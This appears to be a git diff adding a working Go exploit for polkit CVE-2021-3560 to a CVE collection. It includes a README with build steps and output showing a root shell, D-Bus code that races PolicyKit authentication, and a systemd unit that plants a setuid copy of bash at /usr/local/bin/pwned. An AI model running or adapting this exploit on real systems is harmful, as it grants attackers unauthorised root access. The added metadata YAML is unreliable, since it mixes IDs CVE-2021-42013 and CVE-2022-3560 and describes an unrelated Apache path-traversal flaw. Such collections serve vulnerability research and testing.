diff --git a/cve/apache/2021/CVE-2021-3560/LICENSE b/cve/apache/2021/CVE-2021-3560/LICENSE new file mode 100644 index 0000000000000000000000000000000000000000..d1828ea2ae0c0096c0f3ff21239e79b5ed884802 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/LICENSE @@ -0,0 +1,190 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2022 Ricter Zheng + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/cve/apache/2021/CVE-2021-3560/README.md b/cve/apache/2021/CVE-2021-3560/README.md new file mode 100644 index 0000000000000000000000000000000000000000..1f2111d1dc0a858c46c163a58e411fb41ff07226 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/README.md @@ -0,0 +1,40 @@ +PolicyKit CVE-2021-3560 Exploit (Authentication Agent) +==== + +### Technology Details +Blog posts about this exploit : +- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt +- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation + +## Build & Usage +``` +nobody@test:/tmp/CVE-2021-3560$ go build +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267920 - [*] Registering PolicyKit authentication agent ... +... +pid-267915 - [-] Exploit failed, please try again +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267963 - [*] Registering PolicyKit authentication agent ... +pid-267963 - [*] Authentication agent main loop running ... +pid-267968 - [*] Registering PolicyKit authentication agent ... +pid-267973 - [*] Registering PolicyKit authentication agent ... +pid-267968 - [*] Authentication agent main loop running ... +pid-267973 - [*] Authentication agent main loop running ... +pid-267963 - [*] Starting systemd service 'pwnkit.service' ... +pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ... +pid-267973 - [*] Reloading systemd daemon ... +pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units' +pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a +pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files' +pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80 +pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon' +pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2 +pid-267958 - [+] File exists, popping root shell ... +pwned-5.0# id +uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup) +``` + +## License +Apache License diff --git a/cve/apache/2021/CVE-2021-3560/agent.go b/cve/apache/2021/CVE-2021-3560/agent.go new file mode 100644 index 0000000000000000000000000000000000000000..c8fd629da7dc83a4da64f5499cd999ce37b6a173 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/agent.go @@ -0,0 +1,96 @@ +package main + +import ( + "fmt" + "os" + "strconv" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var PolicyKitName = "org.freedesktop.PolicyKit1" +var PolicyKitInterface = "org.freedesktop.PolicyKit1.Authority" +var PolicyKitObjectPath = "/org/freedesktop/PolicyKit1/Authority" +var PolicyKitAgentInterface = "org.freedesktop.PolicyKit1.AuthenticationAgent" +var PolicyKitAgentObjectPath = "/org/freedesktop/PolicyKit1/AuthenticationAgent" + +type Subject struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Identity struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Agent struct { + Conn *dbus.Conn + Authority *dbus.BusObject + Subject *Subject +} + +func Logging(format string, a ...interface{}) { + format = "pid-" + strconv.Itoa(os.Getpid()) + " - " + format + "\n" + fmt.Printf(format, a ...) +} + +func (agent Agent) RegisterAgent() { + Logging("[*] Registering PolicyKit authentication agent ...") + + call := (*agent.Authority).Call(PolicyKitInterface+".RegisterAuthenticationAgent", 0, + agent.Subject, "en_US.UTF-8", PolicyKitAgentObjectPath) + + if call.Err != nil { + Logging("[-] Error while registering authentication agent: %s", call.Err) + os.Exit(2) + } +} + +func Kill(pid int) { + time.Sleep(time.Millisecond * 10) + syscall.Kill(pid, syscall.SIGKILL) +} + +func (agent Agent) BeginAuthentication(action string, _ string, _ string, _ map[string]string, + cookie string, identities []Identity) *dbus.Error { + Logging("[+] Received authentication request for action: '%s'", action) + Logging("[*] Cookie: %s", cookie) + + go Kill(os.Getpid()) + go (*agent.Authority).Call(PolicyKitInterface+".AuthenticationAgentResponse2", 0, + uint32(os.Getuid()), cookie, identities[0]) + time.Sleep(time.Millisecond * 1) + return nil +} + +func (agent Agent) StartAgent() { + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + // setup + agent.Conn = conn + agent.Subject = new(Subject) + agent.Subject.Type = "unix-process" + + agent.Subject.Data = make(map[string]dbus.Variant) + agent.Subject.Data["pid"] = dbus.MakeVariant(uint32(os.Getpid())) + agent.Subject.Data["start-time"] = dbus.MakeVariant(uint64(0)) + + // set authority + obj := agent.Conn.Object(PolicyKitName, dbus.ObjectPath(PolicyKitObjectPath)) + agent.Authority = &obj + + // export methods + mapping := make(map[string]string) + mapping["BeginAuthentication"] = "BeginAuthentication" + agent.Conn.ExportWithMap(agent, mapping, dbus.ObjectPath(PolicyKitAgentObjectPath), PolicyKitAgentInterface) + agent.RegisterAgent() + + Logging("[*] Authentication agent main loop running ...") +} diff --git a/cve/apache/2021/CVE-2021-3560/exploit.go b/cve/apache/2021/CVE-2021-3560/exploit.go new file mode 100644 index 0000000000000000000000000000000000000000..74e80c0fc0d6af7db1b994b001874680fc3f461d --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/exploit.go @@ -0,0 +1,156 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" + "strings" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var SystemdName = "org.freedesktop.systemd1" +var SystemdInterface = "org.freedesktop.systemd1.Manager" +var SystemdObjectPath = "/org/freedesktop/systemd1" + + +func Banner() { + fmt.Println("=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===") +} + +func Fork() { + attr := &syscall.ProcAttr{ + Env: os.Environ(), + Files: []uintptr{os.Stdin.Fd(), os.Stdout.Fd(), os.Stderr.Fd()}, + } + args := append(os.Args, "1") + go syscall.ForkExec("/proc/self/exe", args, attr) +} + +func main() { + if len(os.Args) == 2 { + Banner() + } + if !strings.HasSuffix(os.Args[1], ".service") { + Logging("[-] Unit file must end with .service") + os.Exit(3) + } + + abs, err := filepath.Abs(os.Args[1]) + if err != nil { + Logging("[-] Unit file status error: %s", err) + os.Exit(3) + } + + if len(os.Args) <= 4 { + Fork() + } + + var agent Agent + + if len(os.Args) != 2 { + go agent.StartAgent() + time.Sleep(time.Millisecond * 500) + } + + if len(os.Args) == 3 { + go MethodCallStartService(filepath.Base(abs)) + } else if len(os.Args) == 4 { + go MethodCallEnableUnitFiles(abs) + } else if len(os.Args) == 5 { + go MethodReload() + } else { + for i:=1; i<5; i++ { + time.Sleep(time.Second) + if _, err := os.Stat("/usr/local/bin/pwned"); err == nil { + Logging("[+] File exists, popping root shell ...") + cmd := exec.Command("/usr/local/bin/pwned", "-p") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() + os.Exit(0) + } + } + Logging("[-] Exploit failed, please try again") + os.Exit(1) + } + + select {} +} + + +func MethodCallStartService(ServiceName string) { + Logging("[*] Starting systemd service '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + defer conn.Close() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + call := bus.Call(SystemdInterface+".StartUnit", 4, ServiceName, "replace") + if call.Err != nil { + Logging("[-] Error for starting systemd service: %s", call.Err) + } +} + +func MethodReload() { + Logging("[*] Reloading systemd daemon ...") + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".Reload") + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for reloading daemon: %s", call.Err) + } +} + +func MethodCallEnableUnitFiles(ServiceName string) { + Logging("[*] Enabling systemd unit file '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connection system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".EnableUnitFiles", []string{ServiceName}, false, true) + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for enabling unit file: %s", call.Err) + } +} + +func CreateMessage(obj dbus.BusObject, method string, args ...interface{}) *dbus.Message { + iface := "" + i := strings.LastIndex(method, ".") + if i != -1 { + iface = method[:i] + } + method = method[i+1:] + msg := new(dbus.Message) + msg.Type = dbus.TypeMethodCall + msg.Flags = dbus.FlagAllowInteractiveAuthorization + msg.Headers = make(map[dbus.HeaderField]dbus.Variant) + msg.Headers[dbus.FieldPath] = dbus.MakeVariant(obj.Path()) + msg.Headers[dbus.FieldDestination] = dbus.MakeVariant(obj.Destination()) + msg.Headers[dbus.FieldMember] = dbus.MakeVariant(method) + if iface != "" { + msg.Headers[dbus.FieldInterface] = dbus.MakeVariant(iface) + } + msg.Body = args + if len(args) > 0 { + msg.Headers[dbus.FieldSignature] = dbus.MakeVariant(dbus.SignatureOf(args...)) + } + return msg +} diff --git a/cve/apache/2021/CVE-2021-3560/go.mod b/cve/apache/2021/CVE-2021-3560/go.mod new file mode 100644 index 0000000000000000000000000000000000000000..9e06b1f1e4ed14e36e8d15368177c43eb41f9f27 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/go.mod @@ -0,0 +1,5 @@ +module CVE-2021-3560 + +go 1.13 + +require github.com/godbus/dbus/v5 v5.1.0 diff --git a/cve/apache/2021/CVE-2021-3560/go.sum b/cve/apache/2021/CVE-2021-3560/go.sum new file mode 100644 index 0000000000000000000000000000000000000000..7538a956996b19390ef31ec5228acb768f86e1a7 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/go.sum @@ -0,0 +1,3 @@ +github.com/godbus/dbus v4.1.0+incompatible h1:WqqLRTsQic3apZUK9qC5sGNfXthmPXzUZ7nQPrNITa4= +github.com/godbus/dbus/v5 v5.1.0 h1:4KLkAxT3aOY8Li4FRJe/KvhoNFFxo0m6fNuFUO8QJUk= +github.com/godbus/dbus/v5 v5.1.0/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= diff --git a/cve/apache/2021/CVE-2021-3560/pwnkit.service b/cve/apache/2021/CVE-2021-3560/pwnkit.service new file mode 100644 index 0000000000000000000000000000000000000000..7643565027b05495434115b0ea8d6109c1fe3ee1 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/pwnkit.service @@ -0,0 +1,9 @@ +[Unit] +Description=Super Secure Shell +AllowIsolate=no + +[Service] +ExecStart=/bin/bash -c '/usr/bin/cp /bin/bash /usr/local/bin/pwned; /usr/bin/chmod +s /usr/local/bin/pwned' + +[Install] +Alias=pwnkit.service diff --git a/cve/apache/2021/yaml/CVE-2022-3560.yaml b/cve/apache/2021/yaml/CVE-2022-3560.yaml new file mode 100644 index 0000000000000000000000000000000000000000..5c442daeb478605d268493fbf7bb13a3bf85f6f1 --- /dev/null +++ b/cve/apache/2021/yaml/CVE-2022-3560.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-42013 +source: https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent +info: + name: Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。 + severity: critical + description: | + Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 + scope-of-influence: + Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + reference: + - https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt + - http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-3560 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 723a6199b0075e0b504d2d4a1e9fbf67e5e8f8be..4107610322a34d5568d756ec38989bb96cffab86 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2021-3560 apache-APISIX: - CVE-2022-24112 apache-activemq: